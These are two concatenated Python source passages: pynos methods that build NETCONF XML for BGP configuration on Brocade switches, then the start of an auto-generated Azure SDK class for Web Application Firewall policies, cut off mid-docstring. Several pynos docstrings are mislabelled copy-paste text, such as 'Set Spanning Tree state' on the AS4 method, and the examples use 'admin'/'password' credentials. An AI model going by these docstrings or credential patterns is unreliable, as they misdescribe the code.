def as4_capability(self, **kwargs):
"""Set Spanning Tree state.
Args:
enabled (bool): Is AS4 Capability enabled? (True, False)
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
Returns:
Return value of `callback`.
Raises:
ValueError: if `enabled` are invalid.
Examples:
>>> import pynos.device
>>> switches = ['10.24.39.211', '10.24.39.203']
>>> auth = ('admin', 'password')
>>> for switch in switches:
... conn = (switch, '22')
... with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.local_asn(local_as='65535',
... rbridge_id='225')
... output = dev.bgp.as4_capability(
... rbridge_id='225', enabled=True)
... output = dev.bgp.as4_capability(
... rbridge_id='225', enabled=False)
"""
enabled = kwargs.pop('enabled', True)
callback = kwargs.pop('callback', self._callback)
if not isinstance(enabled, bool):
raise ValueError('%s must be `True` or `False`.' % repr(enabled))
as4_capability_args = dict(vrf_name=kwargs.pop('vrf', 'default'),
rbridge_id=kwargs.pop('rbridge_id', '1'))
as4_capability = getattr(self._rbridge,
'rbridge_id_router_router_bgp_router_bgp'
'_attributes_capability_as4_enable')
config = as4_capability(**as4_capability_args)
if not enabled:
capability = config.find('.//*capability')
capability.set('operation', 'delete')
# shutdown = capability.find('.//*as4-enable')
# shutdown.set('operation', 'delete')
return callback(config)
def remove_bgp(self, **kwargs):
"""Remove BGP process completely.
Args:
vrf (str): The VRF for this BGP process.
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
Returns:
Return value of `callback`.
Raises:
None
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.203', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.local_asn(local_as='65535',
... rbridge_id='225')
... output = dev.bgp.remove_bgp(rbridge_id='225')
"""
rbridge_id = kwargs.pop('rbridge_id', '1')
callback = kwargs.pop('callback', self._callback)
disable_args = dict(rbridge_id=rbridge_id, local_as='65000')
config = getattr(self._rbridge,
'rbridge_id_router_router_bgp_router_bgp_'
'attributes_local_as')(**disable_args)
bgp = config.find('.//*.//*.//*')
bgp.remove(bgp.find('.//*'))
bgp.set('operation', 'delete')
return callback(config)
def neighbor(self, **kwargs):
"""Add BGP neighbor.
Args:
ip_addr (str): IP Address of BGP neighbor.
remote_as (str): Remote ASN of BGP neighbor.
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
delete (bool): Deletes the neighbor if `delete` is ``True``.
get (bool): Get config instead of editing config. (True, False)
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
# Returns:
Return value of `callback`.
Raises:
KeyError: if `remote_as` or `ip_addr` is not specified.
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.203', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.local_asn(local_as='65535',
... rbridge_id='225')
... output = dev.bgp.neighbor(ip_addr='10.10.10.10',
... remote_as='65535', rbridge_id='225')
... output = dev.bgp.neighbor(remote_as='65535',
... rbridge_id='225',
... ip_addr='2001:4818:f000:1ab:cafe:beef:1000:1')
... output = dev.bgp.neighbor(ip_addr='10.10.10.10',
... delete=True, rbridge_id='225')
... output = dev.bgp.neighbor(remote_as='65535',
... rbridge_id='225',
... ip_addr='2001:4818:f000:1ab:cafe:beef:1000:1',
... delete=True)
... dev.bgp.neighbor() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
KeyError
"""
ip_addr = kwargs.pop('ip_addr')
remote_as = kwargs.pop('remote_as', None)
rbridge_id = kwargs.pop('rbridge_id', '1')
delete = kwargs.pop('delete', False)
callback = kwargs.pop('callback', self._callback)
ip_addr = ip_interface(unicode(ip_addr))
if not delete and remote_as is None:
raise ValueError('When configuring a neighbor, you must specify '
'its remote-as.')
neighbor_args = dict(router_bgp_neighbor_address=str(ip_addr.ip),
remote_as=remote_as,
rbridge_id=rbridge_id)
if ip_addr.version == 6:
neighbor_args['router_bgp_neighbor_ipv6_address'] = str(ip_addr.ip)
if ip_addr.version == 4:
neighbor = getattr(self._rbridge,
'rbridge_id_router_router_bgp_'
'router_bgp_attributes_neighbor_neighbor_ips_'
'neighbor_addr_remote_as')
ip_addr_path = './/*remote-as'
else:
neighbor = getattr(self._rbridge,
'rbridge_id_router_router_bgp_'
'router_bgp_attributes_neighbor_'
'neighbor_ipv6s_neighbor_ipv6_addr_remote_as')
ip_addr_path = './/*remote-as'
config = neighbor(**neighbor_args)
if delete and config.find(ip_addr_path) is not None:
if ip_addr.version == 4:
config.find(ip_addr_path).set('operation', 'delete')
config.find('.//*router-bgp-neighbor-address').set('operation',
'delete')
elif ip_addr.version == 6:
config.find(ip_addr_path).set('operation', 'delete')
config.find('.//*router-bgp-neighbor-ipv6-address').set(
'operation', 'delete')
else:
if ip_addr.version == 6:
callback(config)
activate_args = dict(rbridge_id=rbridge_id,
af_ipv6_neighbor_address=str(ip_addr.ip))
activate_neighbor = getattr(self._rbridge,
'rbridge_id_router_router_bgp_'
'address_family_ipv6_ipv6_unicast_'
'default_vrf_neighbor_af_ipv6_'
'neighbor_address_holder_af_ipv6_'
'neighbor_address_activate')
config = activate_neighbor(**activate_args)
if kwargs.pop('get', False):
return callback(config, handler='get_config')
return callback(config)
def neighbor_password(self, **kwargs):
"""Add BGP neighbor.
Args:
ip_addr (str): IP Address of BGP neighbor.
remote_as (str): Remote ASN of BGP neighbor.
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
password (str): Password to be used between the peers for MD5
authentication
delete (bool): Deletes the neighbor if `delete` is ``True``.
get (bool): Get config instead of editing config. (True, False)
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
# Returns:
Return value of `callback`.
Raises:
KeyError: if `remote_as` or `ip_addr` is not specified.
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.203', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.local_asn(local_as='65535',
... rbridge_id='225')
... output = dev.bgp.neighbor(ip_addr='10.10.10.10',
... remote_as='65535', rbridge_id='225')
... output = dev.bgp.neighbor_password(ip_addr='10.10.10.10',
... remote_as='65535', rbridge_id='225', password='test')
... output = dev.bgp.neighbor_password(ip_addr='10.10.10.10',
... remote_as='65535', rbridge_id='225', password='test',
... delete=True)
... output = dev.bgp.neighbor(remote_as='65535',
... rbridge_id='225',
... ip_addr='2001:4818:f000:1ab:cafe:beef:1000:1')
... output = dev.bgp.neighbor_password(remote_as='65535',
... rbridge_id='225',
... ip_addr='2001:4818:f000:1ab:cafe:beef:1000:1',
... password='test')
... output = dev.bgp.neighbor_password(remote_as='65535',
... rbridge_id='225',
... ip_addr='2001:4818:f000:1ab:cafe:beef:1000:1',
... delete=True)
... output = dev.bgp.neighbor(ip_addr='10.10.10.10',
... delete=True, rbridge_id='225')
... output = dev.bgp.neighbor(remote_as='65535',
... rbridge_id='225',
... ip_addr='2001:4818:f000:1ab:cafe:beef:1000:1',
... delete=True)
... dev.bgp.neighbor() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
KeyError
"""
ip_addr = kwargs.pop('ip_addr')
remote_as = kwargs.pop('remote_as', None)
rbridge_id = kwargs.pop('rbridge_id', '1')
delete = kwargs.pop('delete', False)
password = kwargs.pop('password', '')
callback = kwargs.pop('callback', self._callback)
ip_addr = ip_interface(unicode(ip_addr))
get_config = kwargs.pop('get', False)
if password == '' and not delete and not get_config:
raise ValueError('When configuring a neighbor password, you must '
'specify a non empty password')
if not delete and remote_as is None:
raise ValueError('When configuring a neighbor, you must specify '
'its remote-as.')
neighbor_args = dict(router_bgp_neighbor_address=str(ip_addr.ip),
remote_as=remote_as,
rbridge_id=rbridge_id,
password=password)
if ip_addr.version == 4:
neighbor = getattr(self._rbridge,
'rbridge_id_router_router_bgp_'
'router_bgp_attributes_neighbor_neighbor_ips_'
'neighbor_addr_password')
ip_addr_path = './/*password'
else:
neighbor_args['router_bgp_neighbor_ipv6_address'] = str(ip_addr.ip)
neighbor = getattr(self._rbridge,
'rbridge_id_router_router_bgp_'
'router_bgp_attributes_neighbor_'
'neighbor_ipv6s_neighbor_ipv6_addr_password')
ip_addr_path = './/*password'
config = neighbor(**neighbor_args)
if delete:
if ip_addr.version == 4:
config.find('.//*router-bgp-neighbor-address').set('operation',
'delete')
config.find(ip_addr_path).set('operation', 'delete')
elif ip_addr.version == 6:
config.find('.//*router-bgp-neighbor-ipv6-address').set(
'operation', 'delete')
config.find(ip_addr_path).set('operation', 'delete')
if get_config:
return callback(config, handler='get_config')
return callback(config)
def get_bgp_neighbors(self, **kwargs):
"""Get BGP neighbors configured on a device.
Args:
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
vrf (str): The VRF for this BGP process.
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
Returns:
List of 0 or more BGP Neighbors on the specified rbridge.
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.211', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.local_asn(local_as='65535',
... rbridge_id='225')
... output = dev.bgp.neighbor(ip_addr='10.10.10.10',
... remote_as='65535', rbridge_id='225')
... output = dev.bgp.neighbor(remote_as='65535',
... rbridge_id='225',
... ip_addr='2001:4818:f000:1ab:cafe:beef:1000:1')
... result = dev.bgp.get_bgp_neighbors(rbridge_id='225')
... assert len(result) >= 1
... output = dev.bgp.neighbor(ip_addr='10.10.10.10',
... delete=True, rbridge_id='225')
... output = dev.bgp.neighbor(delete=True, rbridge_id='225',
... ip_addr='2001:4818:f000:1ab:cafe:beef:1000:1')
... dev.bgp.neighbor() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
NotImplementedError
KeyError
"""
callback = kwargs.pop('callback', self._callback)
neighbor_args = dict(router_bgp_neighbor_address='',
remote_as='',
vrf_name=kwargs.pop('vrf', 'default'),
rbridge_id=kwargs.pop('rbridge_id', '1'))
neighbor = getattr(self._rbridge,
'rbridge_id_router_router_bgp_'
'router_bgp_attributes_neighbor_neighbor_ips_'
'neighbor_addr_remote_as')
config = neighbor(**neighbor_args)
output = callback(config, handler='get_config')
result = []
urn = "{urn:brocade.com:mgmt:brocade-bgp}"
# IPv4 BGP Neighbor Handling
for item in output.data.findall('.//{*}neighbor-addr'):
neighbor_address = item.find(
'%srouter-bgp-neighbor-address' % urn).text
remote_as = item.find('%sremote-as' % urn).text
item_results = {'neighbor-address': neighbor_address,
'remote-as': remote_as}
result.append(item_results)
# IPv6 BGP Neighbor handling
neighbor_args['router_bgp_neighbor_ipv6_address'] = ''
neighbor = getattr(self._rbridge,
'rbridge_id_router_router_bgp_'
'router_bgp_attributes_neighbor_'
'neighbor_ipv6s_neighbor_ipv6_addr_remote_as')
config = neighbor(**neighbor_args)
output = callback(config, handler='get_config')
for item in output.data.findall('.//{*}neighbor-ipv6-addr'):
neighbor_address = item.find(
'%srouter-bgp-neighbor-ipv6-address' % urn).text
remote_as = item.find('%sremote-as' % urn).text
item_results = {'neighbor-address': neighbor_address,
'remote-as': remote_as}
result.append(item_results)
return result
def redistribute(self, **kwargs):
"""Set BGP redistribute properties.
Args:
vrf (str): The VRF for this BGP process.
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
source (str): Source for redistributing. (connected)
afi (str): Address family to configure. (ipv4, ipv6)
get (bool): Get config instead of editing config. (True, False)
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
Returns:
Return value of `callback`.
Raises:
KeyError: if `source` is not specified.
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.203', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.redistribute(source='connected',
... rbridge_id='225')
... output = dev.bgp.redistribute(source='connected',
... rbridge_id='225', get=True)
... output = dev.bgp.redistribute(source='connected',
... rbridge_id='225', delete=True)
... dev.bgp.redistribute() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
KeyError
... dev.bgp.redistribute(source='connected', rbridge_id='225',
... afi='hodor') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
AttributeError
... dev.bgp.redistribute(source='hodor', rbridge_id='225',
... afi='ipv4') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
AttributeError
"""
# This method is the same as the base method except for one place.
# The class doesn't inherit from the base class, though, so we have
# to duplicate.
source = kwargs.pop('source')
afi = kwargs.pop('afi', 'ipv4')
callback = kwargs.pop('callback', self._callback)
if afi not in ['ipv4', 'ipv6']:
raise AttributeError('Invalid AFI.')
args = dict(rbridge_id=kwargs.pop('rbridge_id', '1'),
afi=afi, source=source)
redistribute = self._redistribute_builder(afi=afi, source=source)
config = redistribute(**args)
if kwargs.pop('get', False):
return callback(config, handler='get_config')
if kwargs.pop('delete', False):
tag = 'redistribute-%s' % source
config.find('.//*%s' % tag).set('operation', 'delete')
return callback(config)
def _redistribute_builder(self, afi='ipv4', source=None):
"""Build BGP redistribute method.
Do not use this method directly. You probably want ``redistribute``.
Args:
source (str): Source for redistributing. (connected)
afi (str): Address family to configure. (ipv4, ipv6)
Returns:
Method to redistribute desired source.
Raises:
KeyError: if `source` is not specified.
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.203', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp._redistribute_builder(source='connected',
... afi='ipv4')
... dev.bgp._redistribute_builder(source='hodor',
... afi='ipv4') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
AttributeError
"""
if source == 'connected':
return getattr(self._rbridge,
'rbridge_id_router_router_bgp_address_family_{0}_'
'{0}_unicast_default_vrf_af_{0}_uc_and_vrf_cmds_'
'call_point_holder_redistribute_connected_'
'redistribute_connected'.format(afi))
# TODO: Add support for 'static' and 'ospf'
else:
raise AttributeError('Invalid source.')
def max_paths(self, **kwargs):
"""Set BGP max paths property.
Args:
vrf (str): The VRF for this BGP process.
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
paths (str): Number of paths for BGP ECMP (default: 8).
afi (str): Address family to configure. (ipv4, ipv6)
get (bool): Get config instead of editing config. (True, False)
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
Returns:
Return value of `callback`.
Raises:
``AttributeError``: When `afi` is not one of ['ipv4', 'ipv6']
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.203', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.max_paths(paths='8',
... rbridge_id='225')
... output = dev.bgp.max_paths(paths='8',
... rbridge_id='225', get=True)
... output = dev.bgp.max_paths(paths='8',
... rbridge_id='225', delete=True)
... output = dev.bgp.max_paths(paths='8', afi='ipv6',
... rbridge_id='225')
... output = dev.bgp.max_paths(paths='8', afi='ipv6',
... rbridge_id='225', get=True)
... output = dev.bgp.max_paths(paths='8', afi='ipv6',
... rbridge_id='225', delete=True)
... output = dev.bgp.max_paths(paths='8', afi='ipv5',
... rbridge_id='225') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
AttributeError
"""
afi = kwargs.pop('afi', 'ipv4')
callback = kwargs.pop('callback', self._callback)
if afi not in ['ipv4', 'ipv6']:
raise AttributeError('Invalid AFI.')
args = dict(rbridge_id=kwargs.pop('rbridge_id', '1'),
load_sharing_value=kwargs.pop('paths', '8'))
max_paths = getattr(self._rbridge,
'rbridge_id_router_router_bgp_address_family_{0}_'
'{0}_unicast_default_vrf_af_common_cmds_holder_'
'maximum_paths_load_sharing_value'.format(afi))
config = max_paths(**args)
if kwargs.pop('get', False):
return callback(config, handler='get_config')
if kwargs.pop('delete', False):
tag = 'maximum-paths'
config.find('.//*%s' % tag).set('operation', 'delete')
return callback(config)
def recursion(self, **kwargs):
"""Set BGP next hop recursion property.
Args:
rbridge_id (str): The rbridge ID of the device on which BGP will be
afi configured in a VCS fabric.
afi (str): Address family to configure. (ipv4, ipv6)
get (bool): Get config instead of editing config. (True, False)
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
Returns:
Return value of `callback`.
Raises:
``AttributeError``: When `afi` is not one of ['ipv4', 'ipv6']
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.203', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.recursion(rbridge_id='225')
... output = dev.bgp.recursion(rbridge_id='225', get=True)
... output = dev.bgp.recursion(rbridge_id='225', delete=True)
... output = dev.bgp.max_paths(rbridge_id='225', afi='ipv6')
... output = dev.bgp.max_paths(rbridge_id='225', afi='ipv6',
... get=True)
... output = dev.bgp.max_paths(rbridge_id='225', afi='ipv6',
... delete=True)
... output = dev.bgp.max_paths(rbridge_id='225', afi='ipv5')
... # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
AttributeError
"""
afi = kwargs.pop('afi', 'ipv4')
callback = kwargs.pop('callback', self._callback)
if afi not in ['ipv4', 'ipv6']:
raise AttributeError('Invalid AFI.')
args = dict(vrf_name=kwargs.pop('vrf', 'default'),
rbridge_id=kwargs.pop('rbridge_id', '1'))
recursion = getattr(self._rbridge,
'rbridge_id_router_router_bgp_address_family_{0}_'
'{0}_unicast_default_vrf_next_hop_'
'recursion'.format(afi))
config = recursion(**args)
if kwargs.pop('get', False):
return callback(config, handler='get_config')
if kwargs.pop('delete', False):
tag = 'next-hop-recursion'
config.find('.//*%s' % tag).set('operation', 'delete')
return callback(config)
def graceful_restart(self, **kwargs):
"""Set BGP next hop recursion property.
Args:
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
afi (str): Address family to configure. (ipv4, ipv6)
get (bool): Get config instead of editing config. (True, False)
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
Returns:
Return value of `callback`.
Raises:
``AttributeError``: When `afi` is not one of ['ipv4', 'ipv6']
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.212', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.graceful_restart(rbridge_id='226')
... output = dev.bgp.graceful_restart(rbridge_id='226',
... get=True)
... output = dev.bgp.graceful_restart(rbridge_id='226',
... delete=True)
... output = dev.bgp.graceful_restart(rbridge_id='226',
... afi='ipv6')
... output = dev.bgp.graceful_restart(rbridge_id='226',
... afi='ipv6', get=True)
... output = dev.bgp.graceful_restart(rbridge_id='226',
... afi='ipv6', delete=True)
... output = dev.bgp.graceful_restart(rbridge_id='226',
... afi='ipv5') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
AttributeError
"""
# TODO: Add support for timers
afi = kwargs.pop('afi', 'ipv4')
callback = kwargs.pop('callback', self._callback)
if afi not in ['ipv4', 'ipv6']:
raise AttributeError('Invalid AFI.')
args = dict(rbridge_id=kwargs.pop('rbridge_id', '1'))
graceful = getattr(self._rbridge,
'rbridge_id_router_router_bgp_address_family_{0}_'
'{0}_unicast_default_vrf_af_common_cmds_holder_'
'graceful_restart_graceful_restart_'
'status'.format(afi))
config = graceful(**args)
if kwargs.pop('get', False):
return callback(config, handler='get_config')
if kwargs.pop('delete', False):
tag = 'graceful-restart'
config.find('.//*%s' % tag).set('operation', 'delete')
return callback(config)
def _multihop_xml(self, **kwargs):
"""Build BGP multihop XML.
Do not use this method directly. You probably want ``multihop``.
Args:
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
neighbor (ipaddress.ip_interface): `ip_interface` object containing
peer IP address (IPv4 or IPv6).
count (str): Number of hops to allow. (1-255)
Returns:
``ElementTree``: XML for configuring BGP multihop.
Raises:
KeyError: if any arg is not specified.
Examples:
>>> import pynos.device
>>> from ipaddress import ip_interface
>>> conn = ('10.24.39.230', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... dev.bgp._multihop_xml(neighbor=ip_interface(unicode(
... '10.10.10.10')), count='5', vrf='default', rbridge_id='1')
... dev.bgp._multihop_xml(
... ip='10.10.10.10') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
KeyError
"""
ip_addr = kwargs.pop('neighbor')
ip = str(ip_addr.ip)
rbr_ns = 'urn:brocade.com:mgmt:brocade-rbridge'
bgp_ns = 'urn:brocade.com:mgmt:brocade-bgp'
config = ET.Element('config')
ele = ET.SubElement(config, 'rbridge-id', xmlns=rbr_ns)
ET.SubElement(ele, 'rbridge-id').text = kwargs.pop('rbridge_id')
ele = ET.SubElement(ele, 'router')
ele = ET.SubElement(ele, 'router-bgp', xmlns=bgp_ns)
ele = ET.SubElement(ele, 'router-bgp-attributes')
ele = ET.SubElement(ele, 'neighbor')
if ip_addr.version == 4:
ele = ET.SubElement(ele, 'neighbor-ips')
ele = ET.SubElement(ele, 'neighbor-addr')
ET.SubElement(ele, 'router-bgp-neighbor-address').text = ip
else:
ele = ET.SubElement(ele, 'neighbor-ipv6s')
ele = ET.SubElement(ele, 'neighbor-ipv6-addr')
ET.SubElement(ele, 'router-bgp-neighbor-ipv6-address').text = ip
ele = ET.SubElement(ele, 'ebgp-multihop')
ET.SubElement(ele, 'ebgp-multihop-count').text = kwargs.pop('count')
return config
def _update_source_xml(self, **kwargs):
"""Build BGP update source XML.
Do not use this method directly. You probably want ``update_source``.
This currently only supports loopback interfaces.
Args:
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
neighbor (ipaddress.ip_interface): `ip_interface` object containing
peer IP address (IPv4 or IPv6).
int_type (str): Interface type (loopback)
int_name (str): Interface identifier (1, 5, 7, etc)
Returns:
``ElementTree``: XML for configuring BGP update source.
Raises:
KeyError: if any arg is not specified.
Examples:
>>> import pynos.device
>>> from ipaddress import ip_interface
>>> conn = ('10.24.39.230', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp._update_source_xml(neighbor=ip_interface(
... unicode('10.10.10.10')), rbridge_id='1',
... int_type='loopback', int_name='1')
"""
ip_addr = kwargs.pop('neighbor')
ip = str(ip_addr.ip)
rbr_ns = 'urn:brocade.com:mgmt:brocade-rbridge'
bgp_ns = 'urn:brocade.com:mgmt:brocade-bgp'
config = ET.Element('config')
ele = ET.SubElement(config, 'rbridge-id', xmlns=rbr_ns)
ET.SubElement(ele, 'rbridge-id').text = kwargs.pop('rbridge_id')
ele = ET.SubElement(ele, 'router')
ele = ET.SubElement(ele, 'router-bgp', xmlns=bgp_ns)
ele = ET.SubElement(ele, 'router-bgp-attributes')
ele = ET.SubElement(ele, 'neighbor')
if ip_addr.version == 4:
ele = ET.SubElement(ele, 'neighbor-ips')
ele = ET.SubElement(ele, 'neighbor-addr')
ET.SubElement(ele, 'router-bgp-neighbor-address').text = ip
else:
ele = ET.SubElement(ele, 'neighbor-ipv6s')
ele = ET.SubElement(ele, 'neighbor-ipv6-addr')
ET.SubElement(ele, 'router-bgp-neighbor-ipv6-address').text = ip
ele = ET.SubElement(ele, 'update-source')
ET.SubElement(ele, 'loopback').text = kwargs.pop('int_name')
return config
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class WebApplicationFirewallPoliciesOperations:
"""WebApplicationFirewallPoliciesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_03_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.WebApplicationFirewallPolicyListResult"]:
"""Lists all of the protection policies within a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either WebApplicationFirewallPolicyListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_03_01.models.WebApplicationFirewallPolicyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.WebApplicationFirewallPolicyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('WebApplicationFirewallPolicyListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies'} # type: ignore
def list_all(
self,
**kwargs: Any
) -> AsyncIterable["_models.WebApplicationFirewallPolicyListResult"]:
"""Gets all the WAF policies in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either WebApplicationFirewallPolicyListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_03_01.models.WebApplicationFirewallPolicyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.WebApplicationFirewallPolicyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('WebApplicationFirewallPolicyListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies'} # type: ignore
async def get(
self,
resource_group_name: str,
policy_name: str,
**kwargs: Any
) -> "_models.WebApplicationFirewallPolicy":
"""Retrieve protection policy with specified name within a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
